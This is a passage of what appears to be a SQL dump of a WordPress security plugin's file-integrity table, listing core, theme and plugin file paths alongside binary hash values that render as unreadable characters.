X+��ʼ�hg�P{ZBU#�YcS�C�c','',0,'?'),('\Zv��S]RU�m��R�','wp-content/themes/travelify/library/panel/images/arrow-dark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�F�AA��g���','�:�oM�y��DL	A�X)#%|����%�&I��','',0,'?'),('\ZweC�5�	\Z}NE]','wp-content/themes/lightly/page-templates/archive-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q5����Ą�r�dɜ8','���c��PW��V�aA?�a���I��Gr�Q	�','',0,'?'),('\ZzyN\"D��W-p�4�g','wp-content/themes/lightly/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʑU\Z\Z�g��u����','l��Cdԛ?�O��>���T�\r2L�ϭ���/','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z�\'\\}F�h�=�q,e','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T-���0O�/��%�Y�','\0��a/S����<��,�J�3���-O���ʋ','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z���w�,� -,:�&P','wp-content/plugins/wordpress-seo/admin/views/tabs/social/pinterest.php',0,'��E���S����@3','��E���S����@3','�QTs����#w06�=d\'����k\'2Y�\'','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z���ѓ?���}A7','wp-content/themes/hueman/assets/front/fonts/titillium-light-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_���j�r�m���y�','�<�Z�?���:�\'6yr��[�Ӈ���V�','',0,'?'),('\Z�ҝȼ�HVu�GlGb','wp-content/themes/aqueduct/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('\Z�}�>�JxV��^7�','wp-content/plugins/unyson/framework/includes/option-types/background-image/class-fw-option-type-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jԔ���0�\Z\'l��','� ��cx^����?M~�э^������獔�','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\Z�ū�FZ�=���,�','wp-content/themes/supernews/acmethemes/customizer/design-options/design-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�|^��kn��5[%�','XP�<�����3�_,��Ë8���gjK��','',0,'?'),('\Z��2��9��2�R�]�k','wp-content/themes/morfeu/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���<����E�<�L','�=�j��&-�B�\\*7�����s�cm8�Dq��','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��fhk��9�b�','��ĕ�D�tG\Z�iBY���Q>^9�[�V�!AY','',0,'?'),('\Z�r��Nl��\'��7M�','wp-content/themes/sg-window/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ů��g(v��	/','�B��Ta��).���5�������ŕ������','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��L�)�H:|*t','�\'\r�m՚�ƞf\Z�p���\Z0�J���Ǽc�','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Lӏ�..+���d�','r��k�Ω�כ?�ir� A:$�TvG�6��[�d��','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z�5��\\y��A[','wp-content/plugins/unyson/framework/core/extends/class-fw-extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�6Ρ ���','k�o����[��.����1��O���j�(� ','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('p9}dZBw�NN�7`m','wp-content/plugins/wordpress-seo/admin/class-meta-columns.php',0,'�Èߎ3�Lw,��0 ~','�Èߎ3�Lw,��0 ~','.��@TZZ����X�̎�ؼ��x�Ȕ#}>@�;�','',0,'?'),('x��NK�{�+�{�','wp-content/themes/wen-business/assets/js/custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�fV���O�����','��d�ķߚ�En;c#	آ��ܹ�C¦�ߓ�','',0,'?'),('��^�J=i��c#�q','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/options.php',0,'[G��Ж2,&�Z�','[G��Ж2,&�Z�','�{���q�%��+��c���\"`��Y���H','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('%�)\r����\'','wp-content/themes/twentyseventeen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�b�T��iYS��','�H{��A�f,�[�$dn�›�����','',0,'?'),('\'��>�-���7�+�','wp-content/plugins/contact-form-7-designer/cf7-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��E�N��YQ��g�.','��r�t2�.�B���ڋݭt4��F���','',0,'?'),('-8��W�U�=%��%','wp-content/plugins/unyson/framework/extensions/analytics/views/view.php',0,'َ���߈�1aC��8','َ���߈�1aC��8','_�.\\��.\nj��A��pE#K=	��]�b���','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('3`���{���c��c�','wp-content/themes/hueman/assets/front/js/_parts/_main_xfire.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"KD���c�[2�S',')_�5u\\��I�^�›�rI\r/I�$\"{(�','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;٧dZ:�%�|�T','ͷۃ2ԓ����rځ�;�0����m��Cb','',0,'?'),('b�N=���,��S��','wp-content/plugins/contact-form-7/modules/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5_=c���i���','�aOCfv�BJ�b�Q$�a�p�p0[7,f�H�M�','',0,'?'),('f4:���:/�����','wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.scrollVert.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$\r�����{��ui�','-�Ċ�-�}�?�1�ףsS�l����s4�','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('m;��}b�BLז^�7','wp-content/themes/hueman/assets/front/img/demo/2-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)](4$�3y��\'','X���\\�G\n]�d�gו���u�/���J�','',0,'?'),('t��Z��\n�\":�ԝ','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-files-export.php',0,'�H����6���\\r��:�','�H����6���\\r��:�','X��]w 6d��f����^)�a���>��t','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s�‹�=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('�@���\r=��Y','wp-content/themes/nirvana/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�h/��f�s&n>','�*�m��TrW�IƾK�t��l����Ib3','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_g��f\0B:��TS��','��L<�h��V�iy�6M����2ᡴD�W�','',0,'?'),('���<���|Q���','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php',0,'�Y�����>V���r','�Y�����>V���r','�1^=����kb46�4�{�50��~&�d� \0','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('�m�=��gT����','wp-content/themes/square/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zob��/�/���u','�\\,�I�|�ϧ��Xa34AQ2=���=�','',0,'?'),('��s�\r a�\";\'�s','wp-content/themes/relia/inc/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�@8���v�}�b','!��R|J����\Zߜf�P�]���/�ϢJ{','',0,'?'),('�W��Y��qƼ.G�-','wp-content/themes/tortuga/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';n3���2�Ċ?��3x','���L$D\Z���BmH\\�\r��!�|_/���m��','',0,'?'),('WJ	�!�,um�p','wp-content/themes/panoramic/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��b�s�`S�v���','�O���ΕAJv�@b��#>��Q��A �','',0,'?'),('9♠^����g��','wp-content/themes/square/inc/css/right-sidebar.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��a־!^�3�S�','rOe|�<���E9�߬�4�Zи�]��.R','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HAf���>�$3B�','L_�k�o_&��>�hj�8e6��$�ɼ�#|G�','',0,'?'),('ǒ��{�@hg�s�','wp-content/themes/illdy/inc/back-compatible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭ}���>�Z�����','�l�A�*�&\\Y���Q��|o`S�6�\r(D�w','',0,'?'),('�4�&!�t�����`','wp-content/themes/the-minimal/images/search-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P-���p�*BBߘ�ݰ','n�v�WO5{�̘���־0Jo1JNj�W�','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\Z�ij#�����','����-W����i�Td���\\G�Mp�=��','',0,'?'),('9ULTH�fm\n�u��','wp-content/themes/nirvana/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�a]�Y�#7s�Kעy','�uj��le�|@�:?��v%�O,��k��@Lb','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('BcHRg�u�W|','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.org.php',0,'z�[^ɴ�Cn���i�','z�[^ɴ�Cn���i�','��,q��mPT0F��^��N���\rU�w!¼�5f','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qꚒŧ[�L8&�p�','��� R���C����Ηd���P)jI���͜','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~\'��u�sa��','>R���J��v򑵍y�����D���UU<��','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('b��1���ƈ]�EqJ�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/static.php',0,'���̼Y\'�ݞʤ��?','���̼Y\'�ݞʤ��?','k�f�v�z�ۨ؜rc�:���|��HT�','',0,'?'),('c�h�mr0Q^�K�_�','wp-content/themes/relia/inc/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��\n�\rcϸ�?�9','�j%-�����!�ԟ���wf�T-&�}?�','',0,'?'),('m�Mp�K�?�U!�','wp-content/themes/illdy/layout/fonts/glyphicons/glyphicons-halflings-regular.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���tf�e�9� F�','t��a±�\0ӫ�I�D�v2u��\0���+�T�','',0,'?'),('zX7J���M߮:��','wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/manifest.php',0,'=�H���FQ�*��Yt','=�H���FQ�*��Yt','��89�29��J>��hj��a\Z`���i��K�p�','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H׶�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('�>ǀ ��^����7e','wp-content/themes/illdy/layout/css/custom.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�6�y	��߯Jd��','�-�nWm�q��H�nx�{����]�GA�\r��NJ�','',0,'?'),('�\rc��*R��|.�','wp-content/plugins/spam-captcha/core/lang/SL_framework-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I�Q#Z��J�g�','��I�	\Zv̗�f�/�\'�JX��N\n]�b�j','',0,'?'),('�@��P��>ɚ|��','wp-content/themes/relia/template-parts/content-page-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�\'f�j[G.�Q','�[gy��d:�ח�$֘��5��G��N�ƛ','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�#h��W9r)�Ri�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/init.php',0,'�ҽl�������|R��','�ҽl�������|R��','v��L厬-1��	�ݫ�f��X�\"�&A�','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j=��g�]J�\":h4','�;X�����0BQ�2Չfe`��A��`��x�Œ�','',0,'?'),('�趝��Fe�y{!��','wp-content/plugins/all-in-one-wp-migration/lib/view/export/find-replace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4X��U4�Fbf�','*����TR��:U%�vl�EIӏMq5�Z�%�a�','',0,'?'),('�9��k&�9�?�Ț','wp-content/themes/alpha-store/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L%p� ,��cRF��','\'�=~y�s�ev@$��M��0�u�Je��Q:�S�/','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�O��q�nr�RNnx','��>h��1`�ڌ�d�De�nq)��ʢr[�����(','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('}#J\n�o�{s��','wp-content/themes/square/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��<�P����X�cp','��嵞n,K�,4��搰۶L�=zv0����','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�� )�|J<��,','+��TP�,0��/F�C�P�W5�汘y��c�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�l#u;�_1�`K','�o����;s���\nv�_��(�A��rX\\�wA9�','',0,'?'),('}ƿ߲��2�P���','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙNׯ&IQ{sm�� �','�����2��6�8�̓�-�A���̈7�	���','',0,'?'),('&�\\�Xukq�)��/','wp-content/themes/sg-window/img/icons/small/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nz����m�2�a`��\r',']}��A�&��-yæ=\Z]v\"�Y�ES{�.5','',0,'?'),('+�/���\r�1�','wp-content/plugins/spam-captcha/core/templates/js/js_admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('3�*�;i�2^����','wp-content/plugins/wordpress-seo/admin/views/tabs/social/twitterbox.php',0,'/�ʰ��?�\n��9�','/�ʰ��?�\n��9�','����6�]�@bo�O�(�,E7���83S��A','',0,'?'),('6kq���;7P�3��>','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.fastdomain.php',0,'����&��ͨG��E�','����&��ͨG��E�','r�4j5}�<�9,���i\"V~���By�7��%','',0,'?'),('B|}�HJ�;MD5�ou','wp-content/themes/point/images/point-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zul(ڣ��\"','A�@p�S_V�&��/��8e��bK�_�\0��','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('N�*C^�EZ���Km','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/js/any-files.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�I�e���	��}','�+�@�������I\r��^�ʨr e\ZT','',0,'?'),('R(�i��[9}���','wp-content/themes/travelify/languages/fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���3���~��g�','%H�H:E{��.�H�[0\r�K��էc�K\ndX�','',0,'?'),('b�E.\"q$��]\r�z�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/options.php',0,'N�f���D��Y�*�','N�f���D��Y�*�','=1FE�h<TVZ����졹>qĴ\'D�9�lֹ','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��›|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('v`�D\\\r;ǒ�h�2','wp-content/themes/sg-window/img/icons/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����jK��<!�z��k','e�.w�vͭK��K���N�l�R,�$�<W1��','',0,'?'),('�%�S�E�u�	��','wp-content/themes/hueman/assets/front/img/demo/6-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J;������,�\0�3','�eza���\r��.�����ޘ�e�Zу','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('�:^���ĝ��>�G�','wp-content/themes/mh-magazine-lite/languages/ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ne9jH�ƈ;��W�','�a�u`/䵤�e�ӜޛMt�z�CH=�̀K','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�n�&F$�\rġV����','wp-content/themes/hueman/assets/front/css/main-not-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qd�步!�b4�0','p���®�c��d��b���8�\rV�KQ!K','',0,'?'),('�aq�j��y@���','wp-content/themes/point/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y=��)��؟�i�','u��y��f8�)z4%�( ��]W�`���\'9�','',0,'?'),('��v�	G?����','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.ripe.php',0,'αcMM2C�:x0���','αcMM2C�:x0���','��T�*�qo4�{��]\n�%f@������','',0,'?'),('�NT���LC�c','wp-content/themes/illdy/inc/customizer/assets/css/illdy-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��j(-�:O9�E\'','nt�����mҔE�`�b�^�zb��>d��\'�','',0,'?'),('�\r����o<�q���','wp-content/themes/relia/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2K�^���I3_+��','m�f�ȯ������\Z��`��z�#�.�','',0,'?'),('����j�\rf��/S�','wp-content/themes/precious-lite/images/separator.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���\rg�Q�?��','sq@�*%��X�w��vZ�R�~����1x�','',0,'?'),('�k���SG��2����','wp-content/themes/mh-magazine-lite/footer.php',0,'J�R�ɦ̚ż2嶚','J�R�ɦ̚ż2嶚','EdW+��;��a��O\"�%(,N\rF/Ȭ','',0,'?'),('���ȗV_q���*','wp-content/themes/illdy/inc/customizer/panels/contact-us.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��J$+�0�zL\Z9','Sp�`�n8Up*N��=})Q:��	�4o�G�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�|\"݀y����Ch]�',':�P�~�pv�\"�ș�\0<�����dZ�ˆ/','',0,'?'),('Ҩ��S�1�o������','wp-content/plugins/unyson/framework/includes/option-types/color-picker/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n=\Z}�M��8;7�;�','�3S�@��N:\n�74Q�<7��\0�&8����','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��.�% ����Fr','i����������A��}���݅괻Z�','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('�u��8s�$���ޯx','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.register.php',0,'�43M��3\'�\nB�<��Y','�43M��3\'�\nB�<��Y','z�ケ��W��>�g�Ϝ���]V��g	��P','',0,'?'),('���5����0�ni','wp-content/themes/the-minimal/css/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���C3�}�>��','(���qf3ۤ�A��I�N:	��-_��ت��','',0,'?'),('����\Z~!�N����','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/general.php',0,'�B	���2����o','�B	���2����o','��2x�VA~��8���d��ڂ��D�a�','',0,'?'),('��L7��v�q���','wp-content/themes/sg-window/sidebar-1-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�~�բvj�;�','\0��&X������L��r͓j.��}Y�b�\0)��','',0,'?'),('�b���ebՎ�n��<','wp-content/themes/fluida/cryout/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4>��Ή#�C��v�k','\Z��[n���BB��lp�ߨ��/}2ʋ�ǹ�\n','',0,'?'),('6�~��\n7�8U���','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/views/view.php',0,'�$�d��R��\Z]�','�$�d��R��\Z]�','�kH�H�FZ9<�5ݡ@��a���F�O�u���C','',0,'?'),('9�� H1�jH�C�','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_glass_100_f6f6f6_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_G[��A2,����','� 1`g�\'���)T�2�PC�W�6B� 